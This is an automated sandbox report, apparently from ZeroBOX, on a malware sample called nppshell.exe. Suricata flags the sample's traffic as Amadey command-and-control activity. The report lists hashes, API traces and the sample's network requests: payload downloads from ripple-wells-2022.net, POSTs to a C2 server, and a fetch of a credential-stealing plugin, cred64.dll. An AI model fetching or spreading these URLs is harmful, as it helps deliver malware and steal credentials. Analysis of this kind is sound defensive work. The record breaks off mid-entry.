popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

nppshell.exe

Generic Malware Malicious Library Antivirus UPX Malicious Packer BMP Format PE File PE64 DLL OS Processor Check JPEG Format PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Dec. 10, 2022, 2:43 p.m. Dec. 10, 2022, 2:45 p.m.
Size 301.2KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 45a95da55d4eb1e4d7f8d08f52e1f0ee
SHA256 e83cc90eaa0bafe3145cdc992932ac30a1e652a7db32c675fb2d2690b2b1df78
CRC32 0F24FE48
ssdeep 6144:YMzOWna0dbZdKWXmBeirnD1Pz/+AcxZgyAb3plR:YM0EZdn2BJbJz/gxpArrR
PDB Path C:\users\admin\source\repos\restOfLopping\Release\restOfLopping.pdb
Yara
  • IsPE32 - (no description)
  • OS_Processor_Check_Zero - OS Processor Check
  • PE_Header_Zero - PE File Signature
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
ripple-wells-2022.net
A 188.93.233.243
188.93.233.243
IP Address Status Action
188.93.233.243 Active Moloch
164.124.101.2 Active Moloch
45.159.188.118 Active Moloch
85.209.135.109 Active Moloch
89.22.236.225 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49172 -> 85.209.135.109:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 188.93.233.243:80 -> 192.168.56.103:49173 2014819 ET INFO Packed Executable Download Misc activity
TCP 188.93.233.243:80 -> 192.168.56.103:49173 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 188.93.233.243:80 -> 192.168.56.103:49173 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 45.159.188.118:80 2024897 ET USER_AGENTS Go HTTP Client User-Agent Misc activity
TCP 192.168.56.103:49180 -> 45.159.188.118:80 2024897 ET USER_AGENTS Go HTTP Client User-Agent Misc activity
TCP 188.93.233.243:80 -> 192.168.56.103:49173 2014819 ET INFO Packed Executable Download Misc activity
TCP 192.168.56.103:49171 -> 85.209.135.109:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 85.209.135.109:80 -> 192.168.56.103:49171 2014819 ET INFO Packed Executable Download Misc activity
TCP 85.209.135.109:80 -> 192.168.56.103:49171 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 85.209.135.109:80 -> 192.168.56.103:49171 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 45.159.188.118:80 2024897 ET USER_AGENTS Go HTTP Client User-Agent Misc activity
TCP 192.168.56.103:49180 -> 45.159.188.118:80 2024897 ET USER_AGENTS Go HTTP Client User-Agent Misc activity
TCP 188.93.233.243:80 -> 192.168.56.103:49173 2014819 ET INFO Packed Executable Download Misc activity

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "gntuud.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba708
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba788
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba788
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba788
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bb008
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bb008
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bb008
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bb008
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bb008
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bb008
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba788
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba788
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba788
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba8c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba8c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba8c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bb0c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba8c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba8c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba8c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba8c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba8c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba8c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba8c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba948
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba948
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba948
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba948
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba948
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba948
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba948
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba948
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba948
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba948
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba948
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba948
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba948
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ba948
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bac88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bac88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bac88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bac88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bac88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bac88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bac88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bac88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bac88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
pdb_path C:\users\admin\source\repos\restOfLopping\Release\restOfLopping.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .00cfg
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
avicapn32+0xad7b93 @ 0xe17b93
GetEnvironmentVariableA+0x18 VerifyConsoleIoHandle-0xc5 kernel32+0x133b8 @ 0x757f33b8

exception.instruction_r: 90 53 9c bb 6a 02 c1 54 53 66 c1 a4 1c 96 fd 3e
exception.symbol: avicapn32+0xa699bc
exception.instruction: nop
exception.module: avicapn32.exe
exception.exception_code: 0x80000004
exception.offset: 10918332
exception.address: 0xda99bc
registers.esp: 17692104
registers.edi: 3407872
registers.eax: 845448827
registers.ebp: 17694128
registers.edx: 102
registers.ebx: 0
registers.esi: 0
registers.ecx: 784896
1 0 0

__exception__

 stacktrace: 
rundll+0x61b975 syncfiles+0x61c981 @ 0x1061c981
0x2af59c
0x1

exception.instruction_r: 90 53 9c bb 26 47 bd 13 c1 eb 25 0f 84 f2 ff ff
exception.instruction: nop
exception.exception_code: 0x80000004
exception.symbol: rundll+0xb08a9c syncfiles+0xb09aa8
exception.address: 0x10b09aa8
registers.esp: 2813292
registers.edi: 268435456
registers.eax: 1512113082
registers.ebp: 2815316
registers.edx: 112
registers.ebx: 0
registers.esi: 0
registers.ecx: 784896
1 0 0

__exception__

 stacktrace: 
Save+0x898403 cred64+0x8b2c9b @ 0x2be2c9b
0x28f63c

exception.instruction_r: 90 e8 06 b4 ec ff 81 ed 04 00 00 00 66 23 c7 1a
exception.instruction: nop
exception.exception_code: 0x80000004
exception.symbol: Save+0x9ae1e7 cred64+0x9c8a7f
exception.address: 0x2cf8a7f
registers.esp: 2682392
registers.edi: 36896768
registers.eax: 3212885123
registers.ebp: 2684416
registers.edx: 118
registers.ebx: 0
registers.esi: 24
registers.ecx: 784896
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://85.209.135.109/jg94cVd30f/index.php?scr=1
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://85.209.135.109/jg94cVd30f/index.php
suspicious_features GET method with no useragent header suspicious_request GET http://ripple-wells-2022.net/n8exrcvvse1m2/Emit64.exe
suspicious_features GET method with no useragent header suspicious_request GET http://ripple-wells-2022.net/n8exrcvvse1m2/avicapn32.exe
suspicious_features Connection to IP address suspicious_request GET http://45.159.188.118/bot/online?guid=test22-PC\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34
suspicious_features Connection to IP address suspicious_request GET http://45.159.188.118/bot/regex?key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://85.209.135.109/jg94cVd30f/Plugins/cred64.dll
request POST http://85.209.135.109/jg94cVd30f/index.php?scr=1
request POST http://85.209.135.109/jg94cVd30f/index.php
request GET http://ripple-wells-2022.net/n8exrcvvse1m2/Emit64.exe
request GET http://ripple-wells-2022.net/n8exrcvvse1m2/avicapn32.exe
request GET http://45.159.188.118/bot/online?guid=test22-PC\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34
request GET http://45.159.188.118/bot/regex?key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34
request GET http://85.209.135.109/jg94cVd30f/Plugins/cred64.dll
request POST http://85.209.135.109/jg94cVd30f/index.php?scr=1
request POST http://85.209.135.109/jg94cVd30f/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 274432
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002e0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 274432
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00360000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2244
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00230000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2244
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00240000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2388
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10433000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2388
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2388
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f71000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00770000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00780000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00790000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007d0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007e0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2388
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74490000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2388
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73151000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1268
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02790000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02980000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3008
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72811000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3008
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72812000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02492000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02981000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02982000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02517000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3008
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
